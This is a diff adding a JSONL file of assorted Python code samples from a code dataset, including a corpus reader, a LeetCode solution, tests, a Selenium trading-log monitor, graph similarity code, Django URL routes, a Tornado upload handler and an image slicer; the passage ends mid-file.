diff --git "a/2202.jsonl" "b/2202.jsonl" new file mode 100644--- /dev/null +++ "b/2202.jsonl" @@ -0,0 +1,730 @@ +{"seq_id":"497956673","text":"import os\nimport codecs\nfrom warnings import warn\nfrom collections import defaultdict\n\nENCODING = 'utf-8'\n\nclass Entity():\n\n def __init__(self, splits):\n self.pmid = splits[0]\n self.tid = splits[1]\n self.ttype = splits[2]\n self.start = int(splits[3])\n self.end = int(splits[4])\n self.text = splits[5]\n \n def __str__(self):\n \"\"\"String representation.\"\"\"\n return '{}\\t{}\\t{}\\t({}:{})'.format(self.pmid, self.ttype, self.text, self.start, self.end)\n\n\nclass Relation():\n type = 'na'\n\n def __init__(self, pmid, arg1, arg2, rtype):\n \"\"\"Init.\"\"\"\n assert isinstance(arg1, Entity)\n assert isinstance(arg2, Entity)\n self.pmid = str(pmid).strip()\n self.arg1 = arg1\n self.arg2 = arg2\n self.rtype = str(rtype).strip()\n\n\n def __str__(self):\n \"\"\"String representation.\"\"\"\n return '{} ({}->{})'.format(self.rtype, self.arg1.ttype,\n self.arg2.ttype)\n \nclass Document(object):\n def __init__(self, doc_id, text):\n\n self.doc_id = doc_id\n\n self.no_text = True\n self.text = text\n\n self.annot = []\n self.entities = []\n self.entities_dict = dict()\n self.entities_dict1 = dict()\n self.relations = [] \n #self.relations_dict = defaultdict(dict) \n\n\nclass Corpus(object):\n \n\n def __init__(self, corpus_dir, is_test=False):\n self.basename = os.path.basename(corpus_dir)\n self.txt_path = os.path.join(corpus_dir, self.basename + '_abstracts.tsv')\n self.ent_path = os.path.join(corpus_dir, self.basename + '_entities.tsv')\n self.is_test = is_test\n if not is_test:\n self.rel_path = os.path.join(corpus_dir, self.basename + '_gold_standard.tsv')\n\n self.docs = dict()\n self.doc_ids = set()\n\n self.split_doc()\n\n\n def split_doc(self):\n with codecs.open(self.txt_path, encoding=ENCODING) as f_txt:\n for line in f_txt:\n (pmid, title, text) = line.strip().split('\\t')\n self.doc_ids.add(pmid) \n self.docs[pmid] = Document(pmid, title + '\\t' + text)\n\n print (\"# of docs: %d\" % len(self.docs))\n\n with codecs.open(self.ent_path, encoding=ENCODING) as f_ent:\n for line in f_ent:\n splits = line.strip().split('\\t')\n assert len(splits) == 6\n ent = Entity(splits)\n # corpus -> doc -> entities -> entity\n self.docs[ent.pmid].entities_dict[ent.tid] = ent\n self.docs[ent.pmid].entities_dict1[(ent.start, ent.end, ent.ttype, ent.text)] = ent.tid\n self.docs[ent.pmid].entities.append(ent)\n\n if self.docs[ent.pmid].text[ent.start: ent.end] != ent.text:\n print (\"txt: \\\"%s\\\" -> annot:\\\"%s\\\"\\t\\t%s\" % \\\n (self.docs[ent.pmid].text[ent.start: ent.end],\n ent.text,\n line))\n\n if not self.is_test:\n with codecs.open(self.rel_path, encoding=ENCODING) as f_rel:\n for line in f_rel:\n splits = line.strip().split('\\t')\n\n if len(splits) == 4:\n pmid = splits[0]\n arg1 = self.docs[pmid].entities_dict[splits[2][5:]]\n arg2 = self.docs[pmid].entities_dict[splits[3][5:]]\n rtype = splits[1]\n rel = Relation(pmid, arg1, arg2, rtype)\n self.docs[rel.pmid].relations.append(rel)\n #self.docs[rel.pmid].relations_dict[rel.arg1][rel.arg2] = rel\n\n else:\n print (\"annot format error: \" + line)\n","sub_path":"data_utils/chemprot/brat.py","file_name":"brat.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"271648531","text":"class Solution:\n def longestPalindrome(self, s: str) -> int:\n longest = 0\n count = {}\n for c in s:\n if c not in count:\n count[c] = 0\n count[c] += 1\n for c in count:\n longest += count[c] // 2 * 2\n if longest % 2 == 0 and count[c] % 2:\n longest += 1\n return longest\n","sub_path":"lc/409.py","file_name":"409.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"181832158","text":"# Licensed under a 3-clause BSD style license - see file LICENSE\n\n\nimport unittest\nimport ccat.swdm.osd_api.osd_api as osd\nimport data.OSD_function_specifications as functions\nimport sprocConn\n\nclass TestCCAT_SWDM_osd_api(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Create the keyword arguments to the functions under testing\"\"\"\n self.kwargs = {'function_name':'file_location_adder_or_getter',\n 'system_file_id':'1', 'containing_file_path':r'C:\\users\\doofenshmirz\\logs',\n 'full_file_path':\n r'C:\\users\\doofenshmirz\\logs\\20161212T12:34.285TransmogrificationLog6.txt'}\n\n\n def test_execute_function(self):\n \"\"\"Test operation without a database using a given set of keyword inputs\"\"\"\n sprocDict = osd.sproc_parameter_generation(self.kwargs, \n functions.funcSpec[self.kwargs[\"function_name\"]])\n #expected sprocDict\n x = {'@containing_file_path': r\"'C:\\users\\doofenshmirz\\logs'\",\n '@full_file_path':\n r\"'C:\\users\\doofenshmirz\\logs\\20161212T12:34.285TransmogrificationLog6.txt'\",\n '@system_file_id': '1'}\n self.assertEqual(sprocDict,x)\n\n queryString = osd.queryGen(self.kwargs)\n #expected query string\n x = r\"exec spFileLocationAdderOrGetter\"+\\\n r\" @containing_file_path='C:\\users\\doofenshmirz\\logs',\"+\\\n r\"@full_file_path='C:\\users\\doofenshmirz\\logs\\20161212T12:34.\" +\\\n \"285TransmogrificationLog6.txt',\"+\\\n r\"@system_file_id=1\"\n self.assertEqual(queryString,x)\n \n #sprocConn.Conn is a faked-up pyodbc connection object for testing purposes\n con = sprocConn.Con([[1,2],[3,4],[5,6],[7,8]])\n results = osd.execute_function(con, 2, 200, **self.kwargs)\n self.assertEqual([(1,2),(3,4),(5,6),(7,8)],results)\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"osd-api/ccat/swdm/osd_api/tests/test_osd_api.py","file_name":"test_osd_api.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"399580874","text":"'''\nCreated on Mar 27, 2016\ncertain sites do not like being scraped, to get around this python needs to pretend to be a browser.\nYou need to download the program chrome driver http://chromedriver.storage.googleapis.com/index.html\nI use 2.9 win32\njust place chromedriver.exe into the same directory as this app\nInstructions:\nThis has limited features and so requires some playing with at least until someone else or I make it more user friendly\nYou need to be logged in order for it to work. After the first time you log in, it should be able to run automatically,\nyou can open up a new tab and use the c-cex website normally but you don't want to work on the first tab the app opens\nany questions or comments you can contact me at: \nnoe@stakeco.in \nother requirements:\nselenium\npip install selenium\n\n\n\n@author: Noe\n'''\nfrom multiprocessing.managers import State\nurl = 'https://c-cex.com/?id=h&fr=&offset=&f=3'\nimport pickle\nfrom selenium import webdriver\n\n\nimport time\nimport os\nimport winsound\n\nimport re\n\n\nurl = 'https://c-cex.com/?id=h&fr=&offset=&f=3'\n\nclass LogMon():\n def __init__(self, browser, browserconf):\n self.browser = browser\n self.browserconf = browserconf\n \n \n \n def set_strtbutton(self, strtbutton, rfreshlabel, ltradelabel, stslabel):\n self.strtbutton = strtbutton\n self.rfreshlabel = rfreshlabel\n self.ltradelabel = ltradelabel\n self.stslabel = stslabel\n \n def set_orderstatus(self, _orderstatustwo=None):\n self.orderstatustwo = _orderstatustwo\n \n \n \n def getlog(self):\n \n self.strtbutton.config(state='disable')\n \n self.stslabel['text']='currently monitoring'\n self.stslabel['bg']='green'\n \n \n \n self.browser.refresh()\n time.sleep(5)\n orderstatus = self.browserconf.orderstatus('//*[@id=\"flog\"]/table/tbody/tr[2]/td[1]', '//*[@id=\"flog\"]/table/tbody/tr[2]/td[5]', self.browser, self.browserconf)\n self.ltradelabel['text']=str('Last trade accured at ' + str(re.findall('\\d{4}\\-\\d{2}\\-\\d{2}\\s\\d{2}\\:\\d{2}\\:\\d{2}',orderstatus)).replace('u',''))\n \n return orderstatus\n\nclass ordmonsel:\n \n\n \n\n\n def setupbrowser(self):\n \n\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--test-type')\n return webdriver.Chrome(chrome_options=chrome_options)\n \n \n def loadcookies(self, browser):\n _browser=browser\n if os.path.isfile('cookies.pkl'):\n cookies = pickle.load(open('cookies.pkl', 'rb'))\n for cookie in cookies:\n _browser.add_cookie(cookie)\n \n def savecookies(self, browser):\n _browser=browser\n pickle.dump( _browser.get_cookies() , open(\"cookies.pkl\",\"wb\"))\n \n\n\n def orderstatus(self, date, info, browser, browserconf):\n _browser =browser\n \n _browserconf = browserconf\n \n _browserconf.savecookies(browser)\n transdate = browser.find_element_by_xpath(date).text\n transinfo = browser.find_element_by_xpath(info).text\n return transdate + transinfo\n \n def ordalert(self):\n \n ostop = None\n while not ostop:\n \n \n winsound.PlaySound('SystemAsterisk', winsound.SND_ALIAS | winsound.SND_ASYNC | winsound.SND_LOOP )\n\n \n ostop = 'stop'\n winsound.PlaySound('SystemAsterisk', winsound.SND_PURGE)\n \n def alertstop(self):\n winsound.PlaySound('SystemAsterisk', winsound.SND_ALIAS | winsound.SND_ASYNC | winsound.SND_LOOP )\n \n def alertstart(self):\n winsound.PlaySound('SystemAsterisk', winsound.SND_PURGE)\n \n \n \n def openlogpage(self, browser, browserconf, strtbutton):\n _strtbutton =strtbutton\n _strtbutton.config(state='normal')\n _browser = browser\n _browserconf = browserconf\n _browser.get(url)\n _browserconf.loadcookies(_browser)\n _browser.get(url)\n \n","sub_path":"src/ordmonsel.py","file_name":"ordmonsel.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330446355","text":"#!/usr/bin/python3\n\nimport sys\nimport datetime\nimport csv\nimport networkx as nx\n#import graphsim as gs\nimport numpy as np\nimport scipy as sp\nsys.path.append('../Network/')\nfrom make_network import Build_Network\nfrom crime_network import Crime_Network\nfrom police_network import Police_Network\nfrom service_community import ServiceNetwork\nfrom community_libraries import Library_Network\nfrom school_network import SchoolNetwork\nfrom path import Path\n\nclass FindSimilarity:\n \"\"\" Implementation of different similarity measures. \"\"\"\n\n def __init__(self, year, month=1, load=True):\n \"\"\" Accept the graph, G \"\"\"\n\n self.node_index = {}\n self.index_node = {}\n\n if (load == True):\n print (\"Loading data\")\n self.G = self.load_data (year, month)\n\n def _iterator_matrix(self, itr, m, save=False, path=\"sim.csv\", norm=False):\n \"\"\" Converts a iterator to numpy matrix\"\"\"\n\n sim = np.zeros ((m, m))\n\n for i, j, k in itr:\n if (i > 77 or j > 77):\n continue\n if (norm == True):\n sim[i-1, j-1] = k/100\n sim[j-1, i-1] = k/100\n else:\n sim[i-1, j-1] = k\n sim[j-1, i-1] = k\n\n for i in range (m):\n sim [i - 1, i - 1] = 1\n\n if (save == True):\n with open(path, 'w') as csvoutput:\n writer = csv.writer(csvoutput, lineterminator='\\n')\n writer.writerows(sim)\n\n return (sim)\n\n def ascos_similarity (self):\n \"\"\" Uses graphsim node node similarity to find similarity between communities. \"\"\"\n\n node_ids = self.G.nodes ()\n #sim = gs.ascos (self.G, is_weighted=True)\n return (sim)\n\n def get_community_nodes (self):\n \"\"\" Returns list of (u, v) from all communities to all communities. \"\"\"\n\n #Nodes contain all possible (source, target) edges\n nodes = []\n\n #Generate all possible combination of edges\n for i, s in enumerate (self.G.nodes ()):\n for j, t in enumerate (self.G.nodes ()):\n if (s > 77 or t > 77):\n continue\n \n nodes.append ((s, t))\n return (nodes)\n\n def jaccard_similarity(self, only_community=True):\n \"\"\" Finds the jacardian coefficient similarity\"\"\"\n\n nodes = self.get_community_nodes ()\n\n #Find jaccard similarity\n jacc_sim_itr = nx.jaccard_coefficient(self.G, nodes) \n\n #Print similarity matrix\n return (self._iterator_matrix (jacc_sim_itr, 77, save=True, path=\"sim_jacard_2015.csv\"))\n\n def adam_similarity (self):\n \"\"\" Finds adam similarity. \"\"\"\n\n #Get communities nodes\n nodes = self.get_community_nodes ()\n\n #Find adam similarity\n adam_sim_itr = nx.adamic_adar_index(self.G) \n\n #Return similarity matrix\n return (self._iterator_matrix (adam_sim_itr, 77, save=True, path=\"sim_adam.csv\", norm=True))\n\n def pseudo_inverse_laplacian(self):\n \"\"\" Getting the pseudo inverse to obtain the random walk similarity\"\"\"\n\n nodes = self.get_community_nodes ()\n\n L = nx.laplacian_matrix(self.G)\n\n dense_L = L.todense()\n\n pinv_L = np.linalg.pinv(dense_L)\n \n inv_L = pinv_L.A\n \n inv_L = inv_L [0:77, 0:77]\n\n self._inverse_nomalize(inv_L)\n\n np.savetxt (\"pseudo_inverse_laplacian.txt\", inv_L)\n\n return (inv_L)\n\n def _inverse_nomalize (self, inv_L):\n \"\"\" Normalize the ouput from inverse laplacian matrix. \"\"\"\n \n print (\"Size of each row: {}\".format (np.size(inv_L, axis=1)))\n for i in range(np.size(inv_L, axis=1)):\n d = inv_L[i, i]\n m = np.min(inv_L[i, :])\n \n for j in range (np.size(inv_L, axis=1)):\n inv_L[i, j] = inv_L[i, j] - m / d\n\n def load_data (self, year=2015, month=1):\n \"\"\" Load the chicago crime data and represent as network. \"\"\"\n\n self.load = True\n\n path = Path ()\n net = Build_Network ()\n net.load_network (year=year, month=month)\n self.attr = net.get_attributes ()\n G = net.get_network ()\n\n return (G)\n\n def get_similarity (self, jaccard=True, r_walk=False, adam=False):\n \"\"\" Returns similarity for loaded network. \"\"\"\n\n if (self.load == False):\n print (\"Please load the network first. Ex: similarity.load_data ()\")\n return (-1)\n\n if (jaccard == True or adam == True or r_walk == True):\n if (jaccard == True and adam == False and r_walk == False):\n return ([self.jaccard_similarity(), self.G])\n elif (jaccard == False and adam == True and r_walk == False):\n return ([self.adam_similarity(), self.G])\n elif (jaccard == False and adam == False and r_walk == True):\n return ([self.pseudo_inverse_laplacian (), self.G])\n else:\n return (self.G)\n\n def get_attributes (self):\n \"\"\" Returns attributes of the network. \"\"\"\n\n if (self.load == False):\n print (\"Please load the network first. Ex: similarity.load_data ()\")\n return (-1)\n\n return (self.attr)\n\nif (__name__ == '__main__'):\n\n sim = FindSimilarity(2015, month=1)\n sim.adam_similarity ()\n sim.jaccard_similarity ()\n sim.pseudo_inverse_laplacian ()\n #sim.pseudo_inverse_laplacian ()\n #attr = sim.get_attributes ()\n","sub_path":"Code/Analysis/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"432905190","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.urls import path\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.views.defaults import page_not_found, server_error\nfrom django.views.generic.base import RedirectView, TemplateView\n\nfrom wagtail.admin import urls as wagtailadmin_urls\nfrom wagtail.core import urls as wagtail_urls\nfrom wagtail.documents import urls as wagtaildocs_urls\nfrom wagtail.contrib.sitemaps.views import sitemap\nfrom wagtail.images.views.serve import ServeView\n\nfrom core.views import search\n\n\n# Non-translatable URLs\nurlpatterns = [\n url(r\"^api/\", include(\"api.urls\")),\n url(r\"^admin/\", include(wagtailadmin_urls)),\n url(r\"^documents/\", include(wagtaildocs_urls)),\n url(\n r\"^images/([^/]*)/(\\d*)/([^/]*)/[^/]*$\",\n ServeView.as_view(action=\"redirect\"),\n name=\"wagtailimages_serve\",\n ),\n url(r\"^sitemap\\.xml$\", sitemap, name=\"sitemap\"),\n url(\n r\"^robots\\.txt$\",\n TemplateView.as_view(template_name=\"robots.txt\", content_type=\"text/plain\"),\n ),\n]\n\n# Translatable URLs\nurlpatterns += i18n_patterns(\n url(r\"^404/$\", page_not_found, kwargs={\"exception\": Exception(\"Page not Found\")}),\n url(r\"^500/$\", server_error),\n url(r\"^search/\", search, name=\"search\",),\n url(r\"\", include(wagtail_urls)),\n)\n\n\n# hacky redirects:\nurlpatterns += [\n url(\n r\"^lueneburg/(?P.*)\",\n RedirectView.as_view(url=\"/netzwerk-projekte/janun-lüneburg/%(path)s\"),\n ),\n url(\n r\"^weltbewusst-lg\",\n RedirectView.as_view(\n url=\"/netzwerk-projekte/janun-lüneburg/weltbewusst-lüneburg-neu/\"\n ),\n ),\n url(\n r\"^scp\",\n RedirectView.as_view(\n url=\"/netzwerk-projekte/janun-landesbüro/silent-climate-parade/\"\n ),\n ),\n url(\n r\"^herbstspektakel\",\n RedirectView.as_view(\n url=\"/netzwerk-projekte/janun-landesbüro/herbstspektakel/\"\n ),\n ),\n url(\n r\"^imagine\", RedirectView.as_view(url=\"/veranstaltungen/herbstspektakel-2017/\")\n ),\n url(r\"^stadttraum\", RedirectView.as_view(url=\"/veranstaltungen/stadttraum/\")),\n url(\n r\"^veranstaltungen/herbstspektakel-2018\",\n RedirectView.as_view(url=\"/veranstaltungen/stadttraum/\"),\n ),\n url(\n r\"^netzwerk-projekte/janun-landesbuero/(?P.*)\",\n RedirectView.as_view(url=\"/netzwerk-projekte/janun-landesbüro/%(path)s\"),\n ),\n url(\n r\"^netzwerk-projekte/janun-landesb%FCro/(?P.*)\",\n RedirectView.as_view(url=\"/netzwerk-projekte/janun-landesbüro/%(path)s\"),\n ),\n url(r\"^festival\", RedirectView.as_view(url=\"/veranstaltungen/janun-festival/\")),\n url(r\"^webinare\", RedirectView.as_view(url=\"/veranstaltungen/?typ=Online\")),\n]\n\n\n# Serve static and media files from development server\nif settings.DEBUG:\n from django.conf.urls.static import static\n from django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n urlpatterns += staticfiles_urlpatterns()\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","sub_path":"janunde/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397322023","text":"# This comoponent creates a zone made of elements: the user is allowed \n# to override the default attributes and customize it.\n#\n# Hive: A energy simulation plugin developed by the A/S chair at ETH Zurich\n# This component is based on building_physics.py in the RC_BuildingSimulator Github repository\n# https://github.com/architecture-building-systems/RC_BuildingSimulator\n# Extensive documentation is available on the project wiki.\n#\n# Author: Justin Zarb \n#\n# This file is part of Hive\n#\n# Licensing/Copyright and liability comments go here.\n# \n# \n\n\"\"\"\nCreate a customized zone using elements as inputs.\nParameters left blank will be filled with default values.\n-\nProvided by Hive 0.0.1\n \n Args:\n glazed_elements: Element objects with additional glazing properties\n opaque_elements: Element objects\n thermal_bridges: Linear thermal bridge objects\n floor_area: [default=] The conditioned floor area within the zone\n zone_volume: [default=] Volume of the zone being simulated [m^2]\n thermal_capacitance_per_floor_area: [default=165000] Thermal capacitance of the room per \n floor area [J/m2K]. Lightweight = 18000, medium weight = 165000, heavyweight = 360000\n lighting_load: [default=11.7] Lighting Load [W/m2] \n lighting_control: [default=300] Lux threshold at which the lights turn on [Lx]\n lighting_utilization_factor: [default=0.45] How the light entering the window is \n transmitted to the working plane\n lighting_maintenance_factor: [default=0.9] How dirty the window is\n ach_vent: [default= 1.5] Air changes per hour through ventilation \n ach_infl: [default= 0.5] Air changes per hour through infiltration \n ventilation_efficiency: [default=0] The efficiency of the heat recovery system for ventilation. Set to 0 if there is no heat \n recovery.\n t_set_heating : [default=20] Thermal heating set point [C]\n t_set_cooling: [default=26] Thermal cooling set point [C]\n max_cooling_energy_per_floor_area: [default=12] Maximum cooling load. Set to -np.inf for unrestricted cooling [C]\n max_heating_energy_per_floor_area: [default=-12] Maximum heating load per floor area. Set to no.inf for unrestricted heating [C]\n heating_supply_system: The type of heating system. Choices are DirectHeater, ResistiveHeater, HeatPumpHeater. \n Direct heater has no changes to the heating demand load, a resistive heater takes an efficiency into account, \n HeatPumpHeatercalculates a COP based on the outdoor and system supply temperature \n cooling_supply_system: The type of cooling system. Choices are DirectCooler HeatPumpCooler. \n DirectCooler has no changes to the cooling demand load, \n HeatPumpCooler calculates a COP based on the outdoor and system supply temperature \n heating_emission_system: How the heat is distributed to the building\n cooling_emission_system: How the cooling energy is distributed to the building\n Returns:\n readMe!: ...\n Zone: ModularRCZone object\n Zone1_string_: a string which can be pasted into a Python script to test the Building object\n Zone2_string_: a string which can be pasted into a Python script to test the ElementBuilding object\n \n\"\"\"\n\nghenv.Component.Name = \"Hive_Zone2\"\nghenv.Component.NickName = 'Zone2'\nghenv.Component.Message = 'VER 0.0.1\\nMAY_25_2018'\nghenv.Component.IconDisplayMode = ghenv.Component.IconDisplayMode.application\nghenv.Component.Category = \"Hive\"\nghenv.Component.SubCategory = \"1 | Zone\"\n# ComponentExposure=2\n\nimport scriptcontext as sc\nimport Grasshopper.Kernel as gh\nimport Grasshopper.Kernel as ghKernel\nHivePreparation = sc.sticky['HivePreparation']()\nimport math\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\ndef main(elements,thermal_bridges,thermal_attributes,lighting_attributes):\n if not sc.sticky.has_key('ThermalZone'): return \"Add the modular RC component to the canvas!\"\n \n #Declare zone\n ThermalZone = sc.sticky['ThermalZone'](elements = elements,\n thermal_bridges = thermal_bridges,\n floor_area = thermal_attributes['floor_area'],\n volume = thermal_attributes['volume'],\n thermal_capacitance_per_floor_area=thermal_attributes['thermal_capacitance_per_floor_area'],\n ach_vent=thermal_attributes['ach_vent'],\n ach_infl=thermal_attributes['ach_infl'],\n ventilation_efficiency=thermal_attributes['ventilation_efficiency'],\n t_set_heating = thermal_attributes['t_set_heating'],\n t_set_cooling = thermal_attributes['t_set_cooling'],\n max_heating_energy_per_floor_area = thermal_attributes['max_heating_energy_per_floor_area'],\n max_cooling_energy_per_floor_area = thermal_attributes['max_cooling_energy_per_floor_area'],\n heating_supply_system=thermal_attributes['heating_supply_system'],\n cooling_supply_system=thermal_attributes['cooling_supply_system'],\n heating_emission_system=thermal_attributes['heating_emission_system'],\n cooling_emission_system=thermal_attributes['cooling_emission_system'],\n )\n ThermalZone.summary()\n \n # Zone with thermal and lighting attributes\n Zone = sc.sticky['RCModel'](zone=ThermalZone, \n lighting_load=lighting_attributes['lighting_load'],\n lighting_control=lighting_attributes['lighting_control'],\n lighting_utilisation_factor=lighting_attributes['lighting_utilisation_factor'],\n lighting_maintenance_factor=lighting_attributes['lighting_maintenance_factor'])\n \n return Zone\n\ndef raise_error(error_str):\n error = error_str\n e = ghKernel.GH_RuntimeMessageLevel.Error\n ghenv.Component.AddRuntimeMessage(e, error)\n \ndef raise_warning(warning_str):\n warning = warning_str\n w = ghKernel.GH_RuntimeMessageLevel.Warning\n ghenv.Component.AddRuntimeMessage(w, warning)\n\ndef zone_object_string(Zone,unique_inputs,thermal_attributes):\n \n room_sqrt_area = math.sqrt(Zone.floor_area)\n room_height = volume/Zone.floor_area\n \n if 'elements' in unique_inputs.keys():\n window_area = sum([e.area for e in unique_inputs['elements'] if not e.opaque])\n external_envelope_area = sum([e.area for e in unique_inputs['elements']])\n wall_area = sum([e.area for e in unique_inputs['elements'] if e.opaque])\n u_windows = sum([e.area * e.u_value for e in unique_inputs['elements'] if not e.opaque])/window_area\n u_walls = sum([e.area * e.u_value for e in unique_inputs['elements'] if e.opaque])/wall_area\n \n classic_zone_inputs = {'room_depth':room_sqrt_area,\n 'room_width':room_sqrt_area,\n 'room_height':room_height,\n 'window_area':window_area,\n 'external_envelope_area':external_envelope_area,\n 'u_windows':u_windows,\n 'u_walls':u_walls}\n for k in unique_inputs:\n if k not in ['floor_area','thermal_bridges','elements','volume']:\n classic_zone_inputs[k] = unique_inputs[k]\n \n for t in thermal_attributes.keys():\n if 'supply' in t:\n classic_zone_inputs[t] = 'supply_system.'+str(thermal_attributes[t])[9:]\n if 'emission' in t:\n classic_zone_inputs[t] = 'emission_system.'+str(thermal_attributes[t])[9:]\n\n zone1 = 'Building('\n for k,v in classic_zone_inputs.iteritems():\n zone1 += k\n zone1 += '='\n zone1 += str(v)\n zone1 += ',\\n'\n zone1 += ')'\n \n zone2 = 'ElementBuilding('\n for k,v in unique_inputs.iteritems():\n zone2 += k\n zone2 += '='\n zone2 += str(v)\n zone2 += ', '\n zone2 += ')'\n\n return zone1, zone2\n \n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n# Initialize default values which will be used if no input is detected\nthermal_attributes = {\"elements\":None,\n \"thermal_bridges\":None,\n \"floor_area\":34.3,\n \"volume\":106.33,\n \"thermal_capacitance_per_floor_area\":165000,\n \"ach_vent\":1.5,\n \"ach_infl\":0.5,\n \"ventilation_efficiency\":0,\n \"t_set_heating\":20,\n \"t_set_cooling\":26,\n \"max_heating_energy_per_floor_area\":12,\n \"max_cooling_energy_per_floor_area\":-12,\n \"heating_supply_system\":sc.sticky[\"DirectHeater\"],\n \"cooling_supply_system\":sc.sticky[\"DirectCooler\"],\n \"heating_emission_system\":sc.sticky[\"AirConditioning\"],\n \"cooling_emission_system\":sc.sticky[\"AirConditioning\"]\n }\nlighting_attributes = {'lighting_load':11.7,\n 'lighting_control':300.0,\n 'lighting_utilisation_factor':0.45,\n 'lighting_maintenance_factor':0.9}\n\n\n# Replace default values with whatever is inputted to the component\nunique_inputs = {}\n\nfor t in thermal_attributes.keys():\n if locals()[t] is not None:\n thermal_attributes[t] = locals()[t]\n # Add item to unique_inputs\n if 'supply' not in t and 'emission' not in t:\n value = locals()[t]\n elif 'supply' in t:\n value = t+': supply_system.'+str(locals()[t])[22:-2]\n elif 'emission' in t:\n value = t+': emission_system.'+str(locals()[t])[22:-2]\n unique_inputs[t] = value\n\n# Add lighting attributes\nfor l in lighting_attributes.keys():\n if locals()[l] is not None:\n lighting_attributes[l] = locals()[l]\n value = l+':'+str(locals()[l])\n unique_inputs[l] = value\n\n# Initialise thermal bridges\nt = [x for x in thermal_bridges if x is sc.sticky['ThermalBridge']]\nif len(t) != len(thermal_bridges):\n raise_error(\"Invalid thermal bridge detected\")\nif len(t) == 0:\n thermal_bridges = None\n\n# Initialise elements\nif any([type(e).__name__!='Element' for e in elements]):\n raise_error('Invalid Element input')\n\nelif len(elements) == 0:\n Zone = main(None,thermal_bridges,thermal_attributes,lighting_attributes)\n Zone1_string_, Zone2_string_ = zone_object_string(Zone,unique_inputs,thermal_attributes)\nelse:\n Zone = main(elements,thermal_bridges,thermal_attributes,lighting_attributes)\n Zone1_string_, Zone2_string_ = zone_object_string(Zone,unique_inputs,thermal_attributes)\n","sub_path":"Core/HIVE_RC_simulator/src/Hive_Zone2.py","file_name":"Hive_Zone2.py","file_ext":"py","file_size_in_byte":10933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146081688","text":"import tornado.web\nimport os\nimport json\n\nclass Index(tornado.web.RequestHandler):\n\n def get(self, *args, **kwargs):\n #print(\"hello, world\")\n self.write(\"hello,world\\n\")\n\nclass Upload(tornado.web.RequestHandler):\n\n def get(self, *args, **kwargs):\n self.write(json.dumps({'url':'/static/cartoon/test.jpg'}))\n\n def post(self, *args, **kwargs):\n server_path_prefix = 'https://test.s.ads.sohu.com/'\n file_imgs = self.request.files.get('img',None)\n hex_color = self.get_argument(\"color\", 'A25356')\n hex_color = hex_color.strip()\n hex_color = hex_color.lstrip('#')\n print(\"show color\",hex_color)\n #print(hex_color)\n file_img = file_imgs[0]\n image_key = hex_color + '_' + file_img['filename']\n image_download_path = 'static/uploads/{}'.format(image_key)\n image_processed_path = 'static/makeup/{}'.format(image_key)\n #print(type((file_img['body'])))\n with open(image_download_path, 'wb') as f:\n f.write(file_img['body'])\n rgb_color = self.HEX_to_RGB(hex_color)\n\n #print(file_imgs)\n self.write(json.dumps({'url':server_path_prefix + image_processed_path}))\n\n def HEX_to_RGB(self, hex):\n r = int(hex[0:2], 16)\n g = int(hex[2:4], 16)\n b = int(hex[4:6], 16)\n return [r, g, b]\n\n\ndef HEX_to_RGB(hex):\n hex = hex.strip()\n hex = hex.lstrip('#')\n r = int(hex[0:2],16)\n g = int(hex[2:4],16)\n b = int(hex[4:6],16)\n return [r, g, b]\n\nif __name__ == '__main__':\n #################################################################\n print(HEX_to_RGB(\"#A25356\"))\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"510757052","text":"# Training data slicer: change tif to jpeg and then slice up large image into smaller tiles\r\n\r\nimport os\r\nfrom PIL import Image\r\nimport image_slicer\r\n\r\n\r\n# Converts tif to jpg and saves image; tif_img and jpeg_img are file names\r\ndef convert_tif_to_jpeg(tif_img, jpeg_img):\r\n\r\n image = Image.open(\r\n tif_img)\r\n image.convert(mode='RGB')\r\n image.save(jpeg_img)\r\n\r\n return\r\n\r\n\r\n# Slices the image and saves each slice; jpeg_img is file name, num_slices is int number of slices, jpeg_slices is file name, slice_name is prefix for each slice\r\ndef slice_jpeg(jpeg_img, num_slices, jpeg_slices_folder, slice_name):\r\n\r\n tiles = image_slicer.slice(\r\n jpeg_img, num_slices, save=False)\r\n image_slicer.save_tiles(tiles, directory=jpeg_slices_folder,\r\n prefix=slice_name, format='jpeg')\r\n\r\n return\r\n\r\n\r\n# Converts all tif images in folder to jpeg slices in separate folder\r\ndef convert_tif_to_jpeg_slices(tif_image_list, tif_img_directory, jpeg_img_directory, jpeg_slices_directory, num_slices):\r\n\r\n for x in range(len(tif_image_list)):\r\n tif_img_directory = tif_img_directory + '\\\\' + 